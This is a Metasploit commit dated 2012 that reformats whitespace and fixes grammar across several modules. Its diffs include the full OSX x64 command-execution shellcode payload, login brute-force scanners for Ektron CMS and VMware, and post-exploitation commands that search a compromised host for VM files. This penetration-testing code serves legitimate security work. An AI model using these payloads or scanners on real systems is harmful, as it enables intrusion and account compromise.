MSFTidy commits

Whitespace fixes, grammar fixes, and breaking up a multiline SOAP
request.

Squashed commit of the following:

commit 2dfd2472f7afc1a05d3647c7ace0d031797c03d9
Author: Tod Beardsley <todb@metasploit.com>
Date:   Wed Feb 1 10:58:53 2012 -0600

    Break up the multiline SOAP thing

commit 747e62c5be2e6ba99f70c03ecd436fc444fda99e
Author: Tod Beardsley <todb@metasploit.com>
Date:   Wed Feb 1 10:48:16 2012 -0600

    More whitespace and indent

commit 12c42aa1efdbf633773096418172e60277162e22
Author: Tod Beardsley <todb@metasploit.com>
Date:   Wed Feb 1 10:39:36 2012 -0600

    Whitespace fixes

commit 32d57444132fef3306ba2bc42743bfa063e498df
Author: Tod Beardsley <todb@metasploit.com>
Date:   Wed Feb 1 10:35:37 2012 -0600

    Grammar fixes for new modules.

modules/auxiliary/scanner/http/ektron_cms400net.rb

@@ -15,12 +15,13 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize(info={})
 		super(update_info(info,
 				'Name'          => 'Ektron CMS400.NET Default Password Scanner',
-				'Description'   => %q{ 
-					 Ektron CMS400.NET is a web content management system based on .NET.
-					 This module tests for installations that are utilizing default
-					 passwords set by the vendor.  Additionally, it has the ability
-					 to brute force user accounts however is not enabled by default to
-					 prevent account lockouts.
+				'Description'   => %q{
+					Ektron CMS400.NET is a web content management system based on .NET.
+					This module tests for installations that are utilizing default
+					passwords set by the vendor. Additionally, it has the ability
+					to brute force user accounts. Note that Ektron CMS400.NET, by
+					default, enforces account lockouts for regular user account
+					after a number of failed attempts.
 				},
 				'License'       => MSF_LICENSE,
 				'Author'        => ['Justin Cacak']
@@ -55,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 			"#{proto}://#{rhost}:#{rport}#{datastore['URI'].to_s}"
 		end
 	end
-	
+
 	def run_host(ip)
 		begin
 			res = send_request_cgi(
@@ -92,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
 			else
 				print_error("Ektron CMS400.NET login page not found at #{target_url}. May need to set VHOST or RPORT.  [HTTP #{res.code}]")
 			end
-		
+
 		rescue
 			print_error ("Ektron CMS400.NET login page not found at #{target_url}  [HTTP #{res.code}]")
 			return
@@ -157,4 +158,4 @@ class Metasploit3 < Msf::Auxiliary
 
 	end
 
-end
+end

modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb

@@ -42,21 +42,21 @@ class Metasploit3 < Msf::Auxiliary
 				return
 			end
 
-=begin		
+=begin
 			sock.put( "\x6f\x06\xfe" )
 			res = sock.get_once(-1, 15)
-			
+
 			sock.put("\x6f\x61\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
-			res = sock.get_once(-1, 15)			
+			res = sock.get_once(-1, 15)
 
 			sock.put("\x6f\x62\x00\x02\x00\x00\x00")
-			res = sock.get_once(-1, 15)	
+			res = sock.get_once(-1, 15)
 			print_status(Rex::Text.to_hex_dump(res))
-=end		
-			
+=end
+
 			report_service(:host => rhost, :port => rport, :name => "pcanywhere", :info => "")
 			print_status("#{rhost}:#{rport} pcAnywhere")
-		
+
 		rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET
 		rescue ::Exception => e
 			print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")

modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb

@@ -25,9 +25,9 @@ class Metasploit3 < Msf::Auxiliary
 			'Description' => 'Discover active pcAnywhere services through UDP',
 			'Author'      => 'hdm',
 			'License'     => MSF_LICENSE,
-			'References'  => 
+			'References'  =>
 				[
-					['URL', 'http://www.unixwiz.net/tools/pcascan.txt']	
+					['URL', 'http://www.unixwiz.net/tools/pcascan.txt']
 				]
 		)
 
@@ -68,9 +68,9 @@ class Metasploit3 < Msf::Auxiliary
 				begin
 					# Send network query
 					udp_sock.sendto("NQ", ip, rport, 0)
-					
+
 					# Send status query
-					udp_sock.sendto("ST", ip, rport, 0)					
+					udp_sock.sendto("ST", ip, rport, 0)
 				rescue ::Interrupt
 					raise $!
 				rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
@@ -105,20 +105,20 @@ class Metasploit3 < Msf::Auxiliary
 		@results.keys.each do |ip|
 			next unless inside_workspace_boundary?(ip)
 			data = @results[ip]
-			
+
 			info = ""
-			
+
 			if data[:name]
 				info << "Name: #{data[:name]} "
 			end
-			
+
 			if data[:stat]
 				info << "- #{data[:stat]} "
 			end
 
 			if data[:caps]
 				info << "( #{data[:caps]} ) "
-			end			
+			end
 
 			report_service(:host => ip, :port => rport, :proto => 'udp', :name => "pcanywhere", :info => info)
 			report_note(:host => ip, :port => rport, :proto => 'udp', :name => "pcanywhere", :update => :unique, :ntype => "pcanywhere.status", :data => data )
@@ -136,38 +136,38 @@ class Metasploit3 < Msf::Auxiliary
 		end
 
 		data = pkt[0]
-		
+
 		case data
 		when /^NR(........................)(........)/
-		
+
 			name = $1.dup
 			caps = $2.dup
-			
+
 			name = name.gsub(/_+$/, '').gsub("\x00", '').strip
-			caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip	
-		
+			caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip
+
 			@results[addr] ||= {}
 			@results[addr][:name] = name
 			@results[addr][:caps] = caps
-			
+
 		when /^ST(.+)/
 			@results[addr] ||= {}
 			buff = $1.dup
 			stat = 'Unknown'
-						
+
 			if buff[2,1].unpack("C")[0] == 67
 				stat = "Available"
 			end
-			
+
 			if buff[2,1].unpack("C")[0] == 11
 				stat = "Busy"
 			end
-			
+
 			@results[addr][:stat] = stat
 		else
 			print_error("#{addr} Unknown: #{data.inspect}")
 		end
-		
+
 	end
 
 end

modules/auxiliary/scanner/vmware/vmware_http_login.rb

@@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
 		super(
 			'Name'           => 'VMWare Web Login Scanner',
 			'Version'        => '$Revision$',
-			'Description'    => 'This module attempts to authenticate to the VMWare HTTP service 
-							 for VmWare Server, ESX, and ESXI',
+			'Description'    => 'This module attempts to authenticate to the VMWare HTTP service
+							for VMWare Server, ESX, and ESXi',
 			'Author'         => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
 			'References'     =>
 				[
@@ -65,21 +65,22 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def do_login(user, pass)
-		soap_data = '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
-    <SOAP-ENV:Body>
-        <Login xmlns="urn:vim25">
-            <_this type="SessionManager">ha-sessionmgr</_this>
-            <userName>' + user + '</userName>
-            <password>' + pass + '</password>
-        </Login>
-    </SOAP-ENV:Body>
-</SOAP-ENV:Envelope>'
+		soap_data = []
+		soap_data << '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
+		soap_data << '    <SOAP-ENV:Body>'
+		soap_data << '        <Login xmlns="urn:vim25">'
+		soap_data << '            <_this type="SessionManager">ha-sessionmgr</_this>'
+		soap_data << '            <userName>' + user + '</userName>'
+		soap_data << '            <password>' + pass + '</password>'
+		soap_data << '        </Login>'
+		soap_data << '    </SOAP-ENV:Body>'
+		soap_data << '</SOAP-ENV:Envelope>'
 		res = send_request_cgi({
-				'uri'     => '/sdk',
-				'method'  => 'POST',
-				'agent'   => 'VMware VI Client',
-				'data' => soap_data
-				}, 25)
+			'uri'     => '/sdk',
+			'method'  => 'POST',
+			'agent'   => 'VMware VI Client',
+			'data' => soap_data.join("\n")
+		}, 25)
 		if res.code == 200
 			return :success
 		else

modules/exploits/windows/browser/ms12_004_midi.rb

@@ -18,20 +18,20 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 					This module exploits a heap overflow vulnerability in the Windows Multimedia
 				Library (winmm.dll). The vulnerability occurs when parsing specially crafted
-				MIDI files.  Remote code execution can be achieved by using Windows Media Player's
+				MIDI files.  Remote code execution can be achieved by using the Windows Media Player
 				ActiveX control.
 
 					Exploitation is done by supplying a specially crafted MIDI file with
-				specific events, causing the offset calculation being higher than how much is
+				specific events, causing the offset calculation being higher than what is
 				available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing
 				us to either "inc al" or "dec al" a byte.  This can be used to corrupt an array
 				(CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,
 				which leverages remote code execution under the context of the user.
 
-					At this time, for IE 8 target, JRE (Java Runtime Environment) is required
+				Note: At this time, for IE 8 target, JRE (Java Runtime Environment) is required
 				to bypass DEP (Data Execution Prevention).
 
-					Note: Based on our testing, the vulnerability does not seem to trigger when
+				Also note: Based on our testing, the vulnerability does not seem to trigger when
 				the victim machine is operated via rdesktop.
 			},
 			'License'        => MSF_LICENSE,

modules/exploits/windows/misc/hp_magentservice.rb

@@ -8,7 +8,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'HP Diagnostics Server magentservice.exe overflow',
+			'Name'           => 'HP Diagnostics Server magentservice.exe Overflow',
 			'Description'    => %q{
 					This module exploits a stack buffer overflow in HP Diagnostics Server
 				magentservice.exe service. By sending a specially crafted packet, an attacker

modules/payloads/singles/osx/x64/exec.rb

@@ -14,39 +14,40 @@ require 'msf/core'
 
 module Metasploit3
 
-    include Msf::Payload::Single
+	include Msf::Payload::Single
 
-    def initialize(info = {})
-        super(merge_info(info,
-                    'Name'          => 'OSX x64 Execute Command',
-                    'Version'       => '$Revision$',
-                    'Description'   => 'Execute an arbitrary command',
-                    'Author'        => 'argp <argp[at]census-labs.com>',
-                    'License'       => MSF_LICENSE,
-                    'Platform'      => 'osx',
-                    'Arch'          => ARCH_X86_64))
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OSX x64 Execute Command',
+			'Version'       => '$Revision$',
+			'Description'   => 'Execute an arbitrary command',
+			'Author'        => 'argp <argp[at]census-labs.com>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_X86_64
+		))
 
-        # exec payload options
-        register_options(
-                [
-                    OptString.new('CMD',  [ true,  "The command string to execute" ]),
-                ], self.class)
-    end
+		# exec payload options
+		register_options(
+			[
+				OptString.new('CMD',  [ true,  "The command string to execute" ]),
+		], self.class)
+	end
 
-    # build the shellcode payload dynamically based on the user-provided CMD
-    def generate
-        cmd = (datastore['CMD'] || '') << "\x00"
-        call = "\xe8" + [cmd.length].pack('V')
-        payload =
-            "\x48\x31\xc0" +                                # xor rax, rax
-            "\x48\xb8\x3b\x00\x00\x02\x00\x00\x00\x00" +    # mov rax, 0x200003b (execve)
-            call +                                          # call CMD.len
-            cmd +                                           # CMD
-            "\x48\x8b\x3c\x24" +                            # mov rdi, [rsp]
-            "\x48\x31\xd2" +                                # xor rdx, rdx
-            "\x52" +                                        # push rdx
-            "\x57" +                                        # push rdi
-            "\x48\x89\xe6" +                                # mov rsi, rsp
-            "\x0f\x05"                                      # syscall
-    end
+	# build the shellcode payload dynamically based on the user-provided CMD
+	def generate
+		cmd = (datastore['CMD'] || '') << "\x00"
+		call = "\xe8" + [cmd.length].pack('V')
+		payload =
+			"\x48\x31\xc0" +                                # xor rax, rax
+			"\x48\xb8\x3b\x00\x00\x02\x00\x00\x00\x00" +    # mov rax, 0x200003b (execve)
+			call +                                          # call CMD.len
+			cmd +                                           # CMD
+			"\x48\x8b\x3c\x24" +                            # mov rdi, [rsp]
+			"\x48\x31\xd2" +                                # xor rdx, rdx
+			"\x52" +                                        # push rdx
+			"\x57" +                                        # push rdi
+			"\x48\x89\xe6" +                                # mov rsi, rsp
+			"\x0f\x05"                                      # syscall
+	end
 end

modules/post/multi/gather/enum_vbox.rb

@@ -22,10 +22,10 @@ class Metasploit3 < Msf::Post
 	def initialize(info={})
 		super( update_info(info,
 			'Name'           => 'Multi Gather VirtualBox VM Enumeration',
-			'Description'    => %q{ 
+			'Description'    => %q{
 								This module will attempt to enumerate any VirtualBox VMs on the target machine.
 								Due to the nature of VirtualBox, this module can only enumerate VMs registered
-								for the current user. So this module needs to be invoked form a user context.
+								for the current user, thereforce, this module needs to be invoked from a user context.
 								},
 			'License'        => MSF_LICENSE,
 			'Author'         => ['TheLightCosine <thelightcosine[at]metasploit.com>'],

modules/post/multi/gather/find_vmx.rb

@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
 	def initialize(info={})
 		super( update_info(info,
 			'Name'           => 'Multi Gather VMWare VM Identification',
-			'Description'    => %q{ 
+			'Description'    => %q{
 				This module will attempt to find any VMWare virtual machines stored on the target.
 			},
 			'License'        => MSF_LICENSE,
@@ -65,13 +65,13 @@ class Metasploit3 < Msf::Post
 
 
 	def nix_shell_search
-		vms = [] 
+		vms = []
 		res = session.shell_command('find / -name "*.vmx" -type f -print 2>/dev/null')
 		res.each_line do |filename|
 			next unless filename.start_with? '/'
 			begin
 				parse = session.shell_command("cat #{filename}")
-				vms << parse_vmx(parse,filename) 
+				vms << parse_vmx(parse,filename)
 			rescue
 				print_error "Could not read #{filename} properly"
 			end